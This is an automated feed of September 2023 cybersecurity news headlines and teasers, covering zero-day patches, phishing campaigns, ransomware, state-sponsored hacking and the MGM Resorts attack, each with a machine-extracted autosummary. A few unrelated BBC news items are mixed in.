            There is a new battlefield. It is global and challenging to defend. What began with a high-profile incident back in 2007, when Estonia was hit by hackers targeting its government and commercial sector, has evolved into cyber warfare that is being waged constantly worldwide. Today, cyberattacks have become the norm, transforming how we think about war and international conflict as a whole.  From "

            Autosummary: The Cyber Invasion of Ukraine: On August 31, 2023, Five Eyes Agency — an intelligence alliance network composed of agencies from Australia, Canada, New Zealand, the United Kingdom, and the United States — issued a new report revealing that Russian state-sponsored hackers were using the infamous Chisel malware to target the Android devices of Ukrainian military personnel to collect and extract data. The list of countries that have accused China of cyberwarfare is lengthy and includes Australia, Canada, India, Japan, Taiwan, the Vatican, and the US. A New Digital World Order: As complex as cyberwarfare can be, and as significant as its impacts are, the unfortunate truth is that for governments that are rich in resources, cyberwarfare is an increasingly easy-to-access weapon that they can leverage for their own interests. As Beijing’s geopolitical interest in Taiwan and the South China Sea increases, along with a display of military force, cyberattacks that include espionage, cyber theft, and the unethical transfer of technologies and knowledge are expected to escalate. "


            Microsoft Warns of New Phishing Campaign Targeting Corporations via Teams Messages

            financial
            2023-09-13 https://thehackernews.com/2023/09/microsoft-warns-of-new-phishing.html
            Microsoft is warning of a new phishing campaign undertaken by an initial access broker that involves using Teams messages as lures to infiltrate corporate networks. The tech giant’s Threat Intelligence team is tracking the cluster under the name Storm-0324, which is also known by the monikers TA543 and Sagrid. "Beginning in July 2023, Storm-0324 was observed distributing payloads using an "

            Autosummary: This includes a mix of downloaders, banking trojans, ransomware, and modular toolkits such as Nymaim, Gozi, TrickBot, IcedID, Gootkit, Dridex, Sage, GandCrab, and JSSLoader. "


            Microsoft Releases Patch for Two New Actively Exploited Zero-Days Flaws

            exploits
            2023-09-13 https://thehackernews.com/2023/09/microsoft-releases-patch-for-two-new.html
            Microsoft has released software fixes to remediate 59 bugs spanning its product portfolio, including two zero-day flaws that have been actively exploited by malicious cyber actors. Of the 59 vulnerabilities, five are rated Critical, 55 are rated Important, and one is rated Moderate in severity. The update is in addition to 35 flaws patched in the Chromium-based Edge browser since last month’s "

            Autosummary: "


            Update Adobe Acrobat and Reader to Patch Actively Exploited Vulnerability

            exploits
            2023-09-13 https://thehackernews.com/2023/09/update-adobe-acrobat-and-reader-to.html
            Adobe’s Patch Tuesday update for September 2023 comes with a patch for a critical actively exploited security flaw in Acrobat and Reader that could permit an attacker to execute malicious code on susceptible systems. The vulnerability, tracked as CVE-2023-26369, is rated 7.8 for severity on the CVSS scoring system and impacts both Windows and macOS versions of Acrobat DC, Acrobat Reader DC, "

            Autosummary: "


            Mozilla Rushes to Patch WebP Critical Zero-Day Exploit in Firefox and Thunderbird

            exploits
            2023-09-13 https://thehackernews.com/2023/09/mozilla-rushes-to-patch-webp-critical.html
            Mozilla on Tuesday released security updates to resolve a critical zero-day vulnerability in Firefox and Thunderbird that has been actively exploited in the wild, a day after Google released a fix for the issue in its Chrome browser. The shortcoming, assigned the identifier CVE-2023-4863, is a heap buffer overflow flaw in the WebP image format that could result in arbitrary code execution when "

            Autosummary: "


            Read it right! How to spot scams on Reddit

            financial
            2023-09-13 https://www.welivesecurity.com/en/scams/read-it-right-how-spot-scams-reddit/
            Do you know what types of scams and other fakery you should look out for when using a platform that once billed itself as “the front page of the Internet”? "

            Autosummary: In some phishing attacks, scammers send a huge number of messages that are often connected to current events and abuse, for example, community activism, such as when Reddit users who intend to gather for a protest may suddenly receive a fake link for the event. To recognize phishing, read the whole message carefully, look for grammar mistakes, check the sender, and pay attention to links and unexpected attachments. They reach out privately to struggling users who have recently made requests and promise help, ask users for their banking information, or offer a check that ultimately will be returned—leaving the requester’s account in the negative,” reads a post in the r/Assistance subreddit. Spam and upvoting rings: Spamming is a serious issue on Reddit, one that is exacerbated by well-organized groups that abuse the site’s voting system, create fabricated and possibly harmful content and then promote it on Reddit with the help of fake accounts. "


            Threat landscape for industrial automation systems. Statistics for H1 2023

            industry
            2023-09-13 https://ics-cert.kaspersky.com/publications/threat-landscape-for-industrial-automation-systems-statistics-for-h1-2023/
            The statistical data presented in the report was received from ICS computers protected by Kaspersky products that Kaspersky ICS CERT categorizes as part of the industrial infrastructure at organizations. "

            Autosummary: This group includes Windows computers that perform one or several of the following functions:
            - Supervisory control and data acquisition (SCADA) servers
            - Data storage servers (Historian)
            - Data gateways (OPC)
            - Stationary workstations of engineers and operators
            - Mobile workstations of engineers and operators
            - Human Machine Interface (HMI)
            - Computers used for industrial network administration
            - Computers used to develop software for industrial automation systems
            For the purposes of this report, “attacked computers” are those on which Kaspersky security solutions blocked one or more threats during the period in review (in the diagrams above, this can be a month, half-year or year, depending on the context).
            Categories of malicious objects: malicious scripts and phishing pages were blocked on 12.7% of ICS computers; denylisted internet resources, on 11.3%; spyware, on 6%; malicious documents, on 4%; ransomware, on 0.32%.
            Figure: Ten countries and territories with the lowest percentage of ICS computers on which malicious objects were blocked, H1 2023
            Individual industries: In H1 2023, the percentage of ICS computers on which malicious objects were blocked increased in engineering and ICS integration (by 2 pp), manufacture (by 1.9 pp) and energy (by 1.5 pp).
            Email clients – 6%; removable devices – 3.4%.
            H1 2022 saw a noticeable increase in the percentage of ICS computers on which the following threats were blocked: spyware, malicious documents, malicious miners in the form of Windows executables, and ransomware. That was the bad news.
            Figure: Regions ranked by percentage of ICS computers on which threats from the internet were blocked, H1 2023
            The largest increase in the percentage of ICS computers on which internet threats were blocked in the first half of 2023 was recorded in the regions that were historically the safest: Western Europe (by 2.6 pp), the United States and Canada (by 2 pp), and Australia and New Zealand (by 1.4 pp).
            Figure: H1 2023 changes in the percentages of ICS computers on which denylisted internet resources were blocked, by region
            Figure: H1 2023 changes in the percentages of ICS computers on which malicious scripts and phishing pages were blocked, by region
            Both threat types spread via the internet, while malicious scripts and phishing pages also spread via email.
            Figure: Percentage of ICS computers on which malicious objects were blocked, by regions
            You may remember that in the previous half-year, the percentage of ICS computers in Russia and Central Asia on which malicious objects were blocked increased noticeably due to mass infection of websites, including those run by industrial companies, that used an outdated version of a popular Russian CMS.
            Figure: Percentage of ICS computers on which malicious objects from various sources were blocked
            Figure: The percentage of ICS computers on which network folder threats were blocked
            As is the case with the overall threat statistics, the percentage of ICS computers on which malicious objects from various sources were blocked varies by region and country.
            Figure: Fifteen countries and territories with the highest percentage of ICS computers on which internet threats were blocked, H1 2023
            Email clients: Since the first half of 2022, Southern Europe has remained the region with the highest percentage of ICS computers on which malicious email attachments and phishing links were blocked.
            Figure: Percentage of ICS computers on which malicious objects were blocked, by half year
            That said, the percentage of attacked ICS computers dropped in Q1 2023, but then rose again in Q2 2023, reaching the highest quarterly figure since 2022. "


            Colombian migrant begged to be sent home - but died in UK detention

            latam
            2023-09-13 https://www.bbc.co.uk/news/uk-66791416?at_medium=RSS&at_campaign=KARANGA
            Frank Ospina was awaiting deportation - his family say he was willing to leave. "

            Autosummary: "


            Free Download Manager site redirected Linux users to malware for years

            exploits
            2023-09-12 https://www.bleepingcomputer.com/news/security/free-download-manager-site-redirected-linux-users-to-malware-for-years/
            A reported Free Download Manager supply chain attack redirected Linux users to a malicious Debian package repository that installed information-stealing malware. [...] "

            Autosummary: To do this, look for the following files dropped by the malware, and if found, delete them: /etc/cron.d/collect /var/tmp/crond /var/tmp/bs Despite the age of the malicious tools used in these attacks, the signs of suspicious activity on infected computers, and multiple social media reports, the malicious Debian package remained undetected for years. "


            Apple backports BLASTPASS zero-day fix to older iPhones

            exploits
            2023-09-12 https://www.bleepingcomputer.com/news/security/apple-backports-blastpass-zero-day-fix-to-older-iphones/
            Apple released security updates for older iPhones to fix a zero-day vulnerability tracked as CVE-2023-41064 that was actively exploited to infect iOS devices with NSO’s Pegasus spyware. [...] "

            Autosummary: "


            New "MetaStealer" malware targets Intel-based macOS systems

            exploits
            2023-09-12 https://www.bleepingcomputer.com/news/security/new-metastealer-malware-targets-intel-based-macos-systems/
            A new information stealer malware named "MetaStealer" has appeared in the wild, stealing a wide variety of sensitive information from Intel-based macOS computers. [...] "

            Autosummary: Figure: Disk image file (SentinelOne). SentinelOne has observed DMGs named after Adobe software or client work, including the following:
            - Advertising terms of reference (MacOS presentation).dmg
            - CONCEPT A3 full menu with dishes and translations to English.dmg
            - AnimatedPoster.dmg
            - Brief_Presentation-Task_Overview-(SOW)-PlayersClub.dmg
            - AdobeOfficialBriefDescription.dmg
            - Adobe Photoshop 2023 (with AI) installer.dmg
            The malware’s application bundles contain the bare essentials, namely an Info.plist file, a Resources folder with an icon image, and a macOS folder with the malicious Mach-O executable. "


            Ransomware access broker steals accounts via Microsoft Teams phishing

            financial exploits
            2023-09-12 https://www.bleepingcomputer.com/news/security/ransomware-access-broker-steals-accounts-via-microsoft-teams-phishing/
            Microsoft says an initial access broker known for working with ransomware groups has recently switched to Microsoft Teams phishing attacks to breach corporate networks. [...] "

            Autosummary: Nevertheless, the issue was also exploited by APT29, the Russian Foreign Intelligence Service (SVR) hacking division, in attacks against dozens of organizations, including government agencies worldwide. "


            Microsoft September 2023 Patch Tuesday fixes 2 zero-days, 59 flaws

            exploits
            2023-09-12 https://www.bleepingcomputer.com/news/microsoft/microsoft-september-2023-patch-tuesday-fixes-2-zero-days-59-flaws/
            Today is Microsoft’s September 2023 Patch Tuesday, with security updates for 59 flaws, including two actively exploited zero-day vulnerabilities. [...] "

            Autosummary: "


            Adobe warns of critical Acrobat and Reader zero-day exploited in attacks

            exploits
            2023-09-12 https://www.bleepingcomputer.com/news/security/adobe-warns-of-critical-acrobat-and-reader-zero-day-exploited-in-attacks/
            Adobe has released security updates to patch a zero-day vulnerability in Acrobat and Reader tagged as exploited in attacks. [...] "

            Autosummary: "


            Mozilla patches Firefox, Thunderbird against zero-day exploited in attacks

            exploits
            2023-09-12 https://www.bleepingcomputer.com/news/security/mozilla-patches-firefox-thunderbird-against-zero-day-exploited-in-attacks/
            Mozilla released emergency security updates today to fix a critical zero-day vulnerability exploited in the wild, impacting its Firefox web browser and Thunderbird email client. [...] "

            Autosummary: Mozilla addressed the exploited zero-day in Firefox 117.0.1, Firefox ESR 115.2.1, Firefox ESR 102.15.1, Thunderbird 102.15.1, and Thunderbird 115.2.2. "


            Ransomware review: September 2023

            exploits
            2023-09-12 https://www.malwarebytes.com/blog/threat-intelligence/2023/09/ransomware-review-september-2023

            Categories: Threat Intelligence

            Ransomware news in August was highlighted by the sudden fall of CL0P from the list of the monthly most active gangs, while Lockbit returned to the number one spot.

            (Read more...)

            The post Ransomware review: September 2023 appeared first on Malwarebytes Labs.

            "

            Autosummary: Figure: Known ransomware attacks by gang, August 2023. Figure: Known ransomware attacks by country, August 2023. Figure: Known ransomware attacks by industry sector, August 2023. We speculated on reasons for the downward trend in last month’s review, such as it being possibly related to a recent affiliate arrest, but interesting research published last month may also hold the clue to other answers. Once you’ve isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again. This article is based on research by Marcelo Rivero, Malwarebytes’ ransomware specialist, who monitors information published by ransomware gangs on their Dark Web sites. "


            Update Chrome now! Google patches critical vulnerability being exploited in the wild

            exploits
            2023-09-12 https://www.malwarebytes.com/blog/news/2023/09/update-chrome-now-google-patches-critical-vulnerability-which-is-exploited-in-the-wild

            Categories: Exploits and vulnerabilities

            Categories: News

            Tags: Google

            Tags: Chrome

            Tags: CVE-2023-4863

            Tags: WebP

            Tags: buffer overflow

            Tags: 116.0.5845.187/.188

            Chrome users are being urged to patch a critical vulnerability for which an exploit is available.

            (Read more...)

            The post Update Chrome now! Google patches critical vulnerability being exploited in the wild appeared first on Malwarebytes Labs.

            "

            Autosummary: The zero-day patched in this update is listed as: CVE-2023-4863: a heap buffer overflow in WebP, also described as a vulnerability that resides in the WebP image format which could lead to arbitrary code execution or a crash. "


            Microsoft Teams used to deliver DarkGate Loader malware

            exploits
            2023-09-12 https://www.malwarebytes.com/blog/news/2023/09/microsoft-teams-used-to-deliver-darkgate-loader-malware

            Categories: Business

            Categories: News

            Tags: Microsoft Teams

            Tags: DarkGate

            Tags: Loader

            Tags: Trojan

            Tags: Sharepoint

            Tags: AutoIt

            Researchers have found a new distribution method for the DarkGate Loader which circumvents the security features in Microsoft Teams.

            (Read more...)

            The post Microsoft Teams used to deliver DarkGate Loader malware appeared first on Malwarebytes Labs.

            "

            Autosummary: Once active, the malware can be used for several malicious activities like remote access, cryptocurrency mining, keylogging, clipboard stealing, and information stealing. When the shellcode is run, the first thing it does is use the “byte by byte” technique, also known as stacked strings, to create a new file: a Windows executable identified as DarkGate Loader. "


            Two Apple issues added by CISA to its catalog of known exploited vulnerabilities

            exploits
            2023-09-12 https://www.malwarebytes.com/blog/news/2023/09/two-known-apple-issues-added-by-cisa-to-the-catalog-of-known-exploited-vulnerabilities

            Categories: Exploits and vulnerabilities

            Categories: News

            Tags: Blastpass

            Tags: citizenlab

            Tags: pegasus

            Tags: nso

            Tags: cisa

            Tags: apple

            Tags: cve-2023-41064

            Tags: cve-2023-41061

            Tags: buffer overflow

            CISA has added two recently discovered Apple vulnerabilities to its catalog of known exploited vulnerabilities.

            (Read more...)

            The post Two Apple issues added by CISA to its catalog of known exploited vulnerabilities appeared first on Malwarebytes Labs.

            "

            Autosummary: The Cybersecurity & Infrastructure Security Agency (CISA) has added two new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. If a Safari update is available for your device, you can get it by updating or upgrading macOS, iOS, or iPadOS. "


            Major cyberattack leaves MGM Resorts reeling

            ciber
            2023-09-12 https://www.malwarebytes.com/blog/personal/2023/09/major-cyberattack-leaves-mgm-resorts-reeling

            Categories: News

            Categories: Personal

            Tags: MGM resorts

            Tags: hotel

            Tags: casino

            Tags: attack

            Tags: cyber

            Tags: shutdown

            MGM resorts has suffered a major cyberattack leading to shutdowns across the US.

            (Read more...)

            The post Major cyberattack leaves MGM Resorts reeling appeared first on Malwarebytes Labs.

            "

            Autosummary: Source: https://t.co/etNWW0S49y pic.twitter.com/ZgYkv1fD58 — Joe Tidy (@joetidy) September 12, 2023. Some systems are slowly coming back to life, but there’s no estimate for when full functionality will be restored. Meanwhile, BBC reporter Joe Tidy reports that slot machines and casino floors were left empty, and that physical room keys had to be distributed. "


            MGM Resorts shuts down IT systems and slot machines go quiet following “cybersecurity incident”

            ciber
            2023-09-12 https://www.bitdefender.com/blog/hotforsecurity/mgm-resorts-shuts-down-it-systems-and-slot-machines-go-quiet-following-cybersecurity-incident/
            Hotel and casino giant MGM Resorts has revealed that it is investigating a "cybersecurity incident" that has resulted in its website being taken offline, an outage of online booking systems, and even problems with slot machines. Read more in my article on the Hot for Security blog. "

            Autosummary: "


            North Korean hackers targeting vulnerability researchers with zero-day attacks, Google warns

            exploits
            2023-09-12 https://www.bitdefender.com/blog/hotforsecurity/north-korean-hackers-targeting-vulnerability-researchers-with-zero-day-attacks-google-warns/
            State-sponsored hackers, backed by the regime in North Korea, are believed to be using zero-day exploits to target cybersecurity researchers working in the field of vulnerability research and development. Read more in my article on the Hot for Security blog. "

            Autosummary: "


            Critical GitHub Vulnerability Exposes 4,000+ Repositories to Repojacking Attack

            exploits
            2023-09-12 https://thehackernews.com/2023/09/critical-github-vulnerability-exposes.html
            A new vulnerability disclosed in GitHub could have exposed thousands of repositories at risk of repojacking attacks, new findings show. The flaw "could allow an attacker to exploit a race condition within GitHub’s repository creation and username renaming operations," Checkmarx security researcher Elad Rapoport said in a technical report shared with The Hacker News. "Successful exploitation of "

            Autosummary: "


            Sophisticated Phishing Campaign Deploying Agent Tesla, OriginBotnet, and RedLine Clipper

            financial
            2023-09-12 https://thehackernews.com/2023/09/sophisticated-phishing-campaign.html
            A sophisticated phishing campaign is using a Microsoft Word document lure to distribute a trifecta of threats, namely Agent Tesla, OriginBotnet, and RedLine Clipper, to gather a wide range of information from compromised Windows machines. "A phishing email delivers the Word document as an attachment, presenting a deliberately blurred image and a counterfeit reCAPTCHA to lure the recipient into "

            Autosummary: C2 Commands: Commands like "downloadexecute," "uninstall," "update," and "load," present in OriginBotnet, are not found in OriginLogger. "


            Beware: MetaStealer Malware Targets Apple macOS in Recent Attacks

            exploits
            2023-09-12 https://thehackernews.com/2023/09/beware-metastealer-malware-targets.html
            A new information stealer malware called MetaStealer has set its sights on Apple macOS, making the latest in a growing list of stealer families focused on the operating system after MacStealer, Pureland, Atomic Stealer, and Realst. "Threat actors are proactively targeting macOS businesses by posing as fake clients in order to socially engineer victims into launching malicious payloads," "

            Autosummary: "This specific targeting of business users is somewhat unusual for macOS malware, which is more commonly found being distributed via torrent sites or suspicious third-party software distributors as cracked versions of business, productivity or other popular software," Stokes said. "


            Google Rushes to Patch Critical Chrome Vulnerability Exploited in the Wild - Update Now

            exploits
            2023-09-12 https://thehackernews.com/2023/09/google-rushes-to-patch-critical-chrome.html
            Google on Monday rolled out out-of-band security patches to address a critical security flaw in its Chrome web browser that it said has been exploited in the wild. Tracked as CVE-2023-4863, the issue has been described as a case of heap buffer overflow that resides in the WebP image format that could result in arbitrary code execution or a crash. Apple Security Engineering and Architecture (SEAR "



            Cryptoqueen: Accomplice jailed for 20 years for OneCoin financial scam

            financial
            2023-09-12 https://www.bbc.co.uk/news/world-us-canada-66793135?at_medium=RSS&at_campaign=KARANGA
            Sebastian Karl Greenwood was sentenced by a US judge for the massive scam that stole billions from investors.



            Iranian hackers backdoor 34 orgs with new Sponsor malware

            exploits
            2023-09-11 https://www.bleepingcomputer.com/news/security/iranian-hackers-backdoor-34-orgs-with-new-sponsor-malware/
            A nation-state threat actor known as "Charming Kitten" (Phosphorus, TA453, APT35/42) has been observed deploying a previously unknown backdoor malware named "Sponsor" against 34 companies around the globe. [...]

            Autosummary: The campaign identified by ESET researchers spanned March 2021 to June 2022, targeting government and healthcare orgs and firms engaged in financial services, engineering, manufacturing, technology, law, telecommunications, and more.


            Square: Last week’s outage was caused by DNS issue, not a cyberattack

            ciber
            2023-09-11 https://www.bleepingcomputer.com/news/technology/square-last-weeks-outage-was-caused-by-dns-issue-not-a-cyberattack/
            Payment processing firm Square says a widespread outage that took down a large part of the company's infrastructure last week was caused by a DNS issue. [...]

            Autosummary: "The outage impacted an important part of our infrastructure, known as a Domain Name System, or DNS," the company said today.


            Facebook Messenger phishing wave targets 100K business accounts per week

            financial
            2023-09-11 https://www.bleepingcomputer.com/news/security/facebook-messenger-phishing-wave-targets-100k-business-accounts-per-week/
            Hackers use a massive network of fake and compromised Facebook accounts to send out millions of Messenger phishing messages to target Facebook business accounts with password-stealing malware. [...]

            Autosummary: The researchers report roughly 100,000 phishing messages per week, sent mainly to Facebook users in North America, Europe, Australia, Japan, and Southeast Asia.


            Google fixes another Chrome zero-day bug exploited in attacks

            exploits
            2023-09-11 https://www.bleepingcomputer.com/news/google/google-fixes-another-chrome-zero-day-bug-exploited-in-attacks/
            Google released emergency security updates to fix the fourth Chrome zero-day vulnerability exploited in attacks since the start of the year. [...]

            Autosummary: Citizen Lab security researchers have often found and disclosed zero-day bugs abused in highly targeted spyware attacks by government-backed threat actors targeting high-risk individuals such as opposition politicians, journalists, and dissidents worldwide.


            MGM Resorts shuts down IT systems after cyberattack

            ciber
            2023-09-11 https://www.bleepingcomputer.com/news/security/mgm-resorts-shuts-down-it-systems-after-cyberattack/
            MGM Resorts International disclosed today that it is dealing with a cybersecurity issue that impacted some of its systems, including its main website and online reservations. [...]

            Autosummary: The company confirmed the breach in 2020, after an archive with stolen data, including guests' names, dates of birth, email addresses, phone numbers, and physical addresses, was shared freely on a hacker forum.


            The main causes of ransomware reinfection

            exploits ransomware
            2023-09-11 https://www.malwarebytes.com/blog/news/2023/09/the-main-causes-for-ransomware-reinfection

            Categories: News, Ransomware

            Tags: ransomware, reinfection, stolen credentials, vulnerabilities, infected backups, logging, forensic investigation, backdoors

            The main causes for getting reinfected with ransomware can be prevented by performing a forensic analysis.



            Autosummary: The most common reasons for reinfection are: backdoors left behind by the criminals; credentials stolen in the course of the first attack; unpatched vulnerabilities; and restoration of infected backups. In some ransomware attacks criminals have access to the target network for weeks or months, giving them ample opportunity to open a backdoor or otherwise retain the necessary controls and permissions to return and trigger another attack. Not only does a thorough forensic investigation help you find the cause that might be remediated, it's important to be able to follow the tracks the attacker left in your network, so you can reconstruct what access they may have gained and what they may have copied, left behind, changed, or deleted. Once you've isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again.


            Charming Kitten's New Backdoor "Sponsor" Targets Brazil, Israel, and U.A.E.

            latam
            2023-09-11 https://thehackernews.com/2023/09/charming-kitens-new-backdoor-sponsor.html
            The Iranian threat actor known as Charming Kitten has been linked to a new wave of attacks targeting different entities in Brazil, Israel, and the U.A.E. using a previously undocumented backdoor named Sponsor. A Slovak cybersecurity firm is tracking the cluster under the name Ballistic Bobcat. Victimology patterns suggest that the group primarily singles out education, government, and healthcare

            Autosummary: "On December 12th, 2021, the reverse shell dropped a batch file, install.bat, and within minutes of executing the batch file, Ballistic Bobcat operators pushed their newest backdoor, Sponsor."


            Cybercriminals Using PowerShell to Steal NTLMv2 Hashes from Compromised Windows

            ciber
            2023-09-11 https://thehackernews.com/2023/09/cybercriminals-using-powershell-to.html
            A new cyber attack campaign is leveraging the PowerShell script associated with a legitimate red teaming tool to plunder NTLMv2 hashes from compromised Windows systems primarily located in Australia, Poland, and Belgium. The activity has been codenamed Steal-It by Zscaler ThreatLabz. "In this campaign, the threat actors steal and exfiltrate NTLMv2 hashes using customized versions of Nishang's



            New HijackLoader Modular Malware Loader Making Waves in the Cybercrime World

            exploits
            2023-09-11 https://thehackernews.com/2023/09/new-hijackloader-modular-malware-loader.html
            A new malware loader called HijackLoader is gaining traction among the cybercriminal community to deliver various payloads such as DanaBot, SystemBC, and RedLine Stealer. "Even though HijackLoader does not contain advanced features, it is capable of using a variety of modules for code injection and execution since it uses a modular architecture, a feature that most loaders do not have," Zscaler

            Autosummary: "When the stealer is executed, it runs its main function that steals cookies and credentials from several Chromium-based web browsers, then exfiltrates the data to the C&C server and to the Telegram bot," security researcher Jaromir Horejsi said. "Even though HijackLoader does not contain advanced features, it is capable of using a variety of modules for code injection and execution since it uses a modular architecture, a feature that most loaders do not have," Zscaler ThreatLabz researcher Nikolaos Pantazopoulos said.


            Chile marks military coup as divisions continue

            latam ransomware
            2023-09-11 https://www.bbc.co.uk/news/world-latin-america-66706064?at_medium=RSS&at_campaign=KARANGA
            The left-wing government has condemned the 1973 coup but the opposition accuses it of fuelling divisions.



            Associated Press warns that AP Stylebook data breach led to phishing attack

            financial
            2023-09-10 https://www.bleepingcomputer.com/news/security/associated-press-warns-that-ap-stylebook-data-breach-led-to-phishing-attack/
            The Associated Press is warning of a data breach impacting AP Stylebook customers where the attackers used the stolen data to conduct targeted phishing attacks. [...]



            Guyana scrambles to make the most of oil wealth

            industry
            2023-09-10 https://www.bbc.co.uk/news/world-latin-america-66715777?at_medium=RSS&at_campaign=KARANGA
            Guyana's president says the country has to hurry if it wants to maximise its recent discoveries.



            Microsoft Teams phishing attack pushes DarkGate malware

            financial exploits
            2023-09-09 https://www.bleepingcomputer.com/news/security/microsoft-teams-phishing-attack-pushes-darkgate-malware/
            A new phishing campaign is abusing Microsoft Teams messages to send malicious attachments that install the DarkGate Loader malware. [...]

            Autosummary: It is a potent malware that supports a wide range of malicious activities, including hVNC for remote access, cryptocurrency mining, reverse shell, keylogging, clipboard stealing, and information stealing (files, browser data).


            Cybercriminals Weaponizing Legitimate Advanced Installer Tool in Crypto-Mining Attacks

            ciber
            2023-09-09 https://thehackernews.com/2023/09/cybercriminals-weaponizing-legitimate.html
            A legitimate Windows tool used for creating software packages called Advanced Installer is being abused by threat actors to drop cryptocurrency-mining malware on infected machines since at least November 2021. "The attacker uses Advanced Installer to package other legitimate software installers, such as Adobe Illustrator, Autodesk 3ds Max, and SketchUp Pro, with malicious scripts and uses

            Autosummary: Cisco's analysis of the DNS request data sent to the attacker's infrastructure shows that the victimology footprint spans France and Switzerland, followed by sporadic infections in the U.S., Canada, Algeria, Sweden, Germany, Tunisia, Madagascar, Singapore, and Vietnam.


            Cisco warns of VPN zero-day exploited by ransomware gangs

            exploits ransomware
            2023-09-08 https://www.bleepingcomputer.com/news/security/cisco-warns-of-vpn-zero-day-exploited-by-ransomware-gangs/
            Cisco is warning of a CVE-2023-20269 zero-day vulnerability in its Cisco Adaptive Security Appliance (ASA) and Cisco Firepower Threat Defense (FTD) that is actively exploited by ransomware operations to gain initial access to corporate networks. [...]

            Autosummary: Vulnerability details: The CVE-2023-20269 flaw is located within the web services interface of the Cisco ASA and Cisco FTD devices, specifically in the functions that handle authentication, authorization, and accounting (AAA).


            Dymocks Booksellers suffers data breach impacting 836k customers

            financial
            2023-09-08 https://www.bleepingcomputer.com/news/security/dymocks-booksellers-suffers-data-breach-impacting-836k-customers/
            Dymocks Booksellers is warning customers their personal information was exposed in a data breach after the company's database was shared on hacking forums. [...]

            Autosummary: The investigation carried out by Dymocks and contracted experts has so far confirmed that the following types of customer information have been compromised: full name, date of birth, email address, postal address, gender, and membership details (gold expiry date, account status, account creation date, card ranking).


            The Week in Ransomware - September 8th 2023 - Conti Indictments

            exploits ransomware
            2023-09-08 https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-september-8th-2023-conti-indictments/
            It started as a slow ransomware news week but slowly picked up pace with the Department of Justice announcing indictments on TrickBot and Conti operations members. [...]

            Autosummary: Contributors and those who provided new ransomware information and stories this week include: @BleepinComputer, @VK_Intel, @jorntvdw, @LawrenceAbrams, @PolarToffee, @FourOctets, @struppigel, @DanielGallagher, @malwareforme, @Ionut_Ilascu, @demonslay335, @billtoulas, @serghei, @fwosar, @malwrhunterteam, @Seifreed, @cloudsek, @SecurityAura, @SentinelOne, and @pcrisk.


            Apple Rushes to Patch Zero-Day Flaws Exploited for Pegasus Spyware on iPhones

            exploits
            2023-09-08 https://thehackernews.com/2023/09/apple-rushes-to-patch-zero-day-flaws.html
            Apple on Thursday released emergency security updates for iOS, iPadOS, macOS, and watchOS to address two zero-day flaws that have been exploited in the wild to deliver NSO Group's Pegasus mercenary spyware. The issues are described as below - CVE-2023-41061 - A validation issue in Wallet that could result in arbitrary code execution when handling a maliciously crafted attachment. CVE-2023-41064

            Autosummary: The updates are available for the following devices and operating systems - iOS 16.6.1 and iPadOS 16.6.1 - iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later; macOS


            Cisco Issues Urgent Fix for Authentication Bypass Bug Affecting BroadWorks Platform

            exploits
            2023-09-08 https://thehackernews.com/2023/09/cisco-issues-urgent-fix-for.html
            Cisco has released security fixes to address multiple security flaws, including a critical bug, that could be exploited by a threat actor to take control of an affected system or cause a denial-of-service (DoS) condition. The most severe of the issues is CVE-2023-20238, which has the maximum CVSS severity rating of 10.0. It's described as an authentication bypass flaw in the Cisco BroadWorks

            Autosummary: The issue, per the company, impacts the two BroadWorks products that have one of the following apps enabled: AuthenticationService, BWCallCenter, BWReceptionist, CustomMediaFilesRetrieval, ModeratorClientApp, PublicECLQuery, PublicReporting, UCAPI, Xsi-Actions, Xsi-Events, Xsi-MMTel, or Xsi-VTR. Outside of Juniper Networks, FRRouting, and OpenBGPd, the flaw also affects other vendors like D-Link, EXOS (CVE-2023-40457), Red Hat, and Ubuntu.


            Protecting Your Microsoft IIS Servers Against Malware Attacks

            exploits
            2023-09-08 https://thehackernews.com/2023/09/protecting-your-microsoft-iis-servers.html
            Microsoft Internet Information Services (IIS) is a web server software package designed for Windows Server. Organizations commonly use Microsoft IIS servers to host websites, files, and other content on the web. Threat actors increasingly target these Internet-facing resources as low-hanging fruit for finding and exploiting vulnerabilities that facilitate access to IT environments. Recently, a

            Autosummary: Of particular note for security teams is that the vulnerabilities targeted in these attacks for the initial breach were commonly scanned-for, high-profile vulnerabilities that included Log4Shell, a vulnerability in the desktop VoIP solution 3CX, and a remote code execution vulnerability in the digital certificate solution MagicLine4NX. As is evidenced by Lazarus' attacks, common vulnerabilities in web applications hosted on Microsoft IIS can be leveraged by adversaries to compromise the server, gain unauthorized access, steal data, or launch further attacks. Since then, it has seen several iterations, improvements, and features added to align with the evolving Internet, including support for HTTPS (secure HTTP) requests.


            North Korean Hackers Exploit Zero-Day Bug to Target Cybersecurity Researchers

            exploits ciber
            2023-09-08 https://thehackernews.com/2023/09/north-korean-hackers-exploit-zero-day.html
            Threat actors associated with North Korea are continuing to target the cybersecurity community using a zero-day bug in unspecified software over the past several weeks to infiltrate their machines. The findings come from Google's Threat Analysis Group (TAG), which found the adversary setting up fake accounts on social media platforms like X (formerly Twitter) and Mastodon to forge

            Autosummary: "North Korean cyber threat actors pursue cyber operations aiming to (1) collect intelligence on the activities of the state's perceived adversaries: South Korea, the United States, and Japan, (2) collect intelligence on other countries' military capabilities to improve their own, and (3) collect cryptocurrency funds for the state," Microsoft said.


            CISA Warning: Nation-State Hackers Exploit Fortinet and Zoho Vulnerabilities

            exploits government
            2023-09-08 https://thehackernews.com/2023/09/cisa-warning-nation-state-hackers.html
            The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Thursday warned that multiple nation-state actors are exploiting security flaws in Fortinet FortiOS SSL-VPN and Zoho ManageEngine ServiceDesk Plus to gain unauthorized access and establish persistence on compromised systems. "Nation-state advanced persistent threat (APT) actors exploited CVE-2022-47966 to gain unauthorized

            Autosummary: "Nation-state advanced persistent threat (APT) actors exploited CVE-2022-47966 to gain unauthorized access to a public-facing application (Zoho ManageEngine ServiceDesk Plus), establish persistence, and move laterally through the network," according to a joint alert published by the agency, alongside the Federal Bureau of Investigation (FBI) and the Cyber National Mission Force (CNMF).


            Apple shares slide after China government iPhone ban reports

            government
            2023-09-08 https://www.bbc.co.uk/news/business-66748092?at_medium=RSS&at_campaign=KARANGA
